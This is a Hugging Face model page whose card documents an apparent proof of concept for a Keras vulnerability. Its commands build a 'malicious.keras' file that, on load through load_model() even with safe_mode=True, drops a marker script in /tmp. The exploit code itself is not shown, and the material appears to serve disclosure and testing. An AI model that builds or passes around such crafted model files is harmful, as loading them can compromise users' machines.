Hugging Face's logo

kirualawliet
/
poc_model_20260616

Keras
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Prerequisites

Tested with:

pip install tensorflow==2.21.0 keras==3.12.2 pillow==12.2.0 numpy==2.2.6

Keras source commit: 76c1585 (master branch)

Quick Start 

# Generate only
python poc.py -g /tmp/malicious.keras

# Load and trigger using PoC harness
python poc.py -l /tmp/malicious.keras
ls -l /tmp/keras_vuln01_pwned.sh

# Or: trigger via standard keras.saving.load_model()
python -c 'import keras;keras.saving.load_model("malicious.keras", safe_mode=True)'
ls -l /tmp/keras_vuln01_pwned.sh

# Full pipeline: generate malicious .keras + observe auto-trigger on load_model()
python poc.py
ls -l /tmp/keras_vuln01_pwned.sh
Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support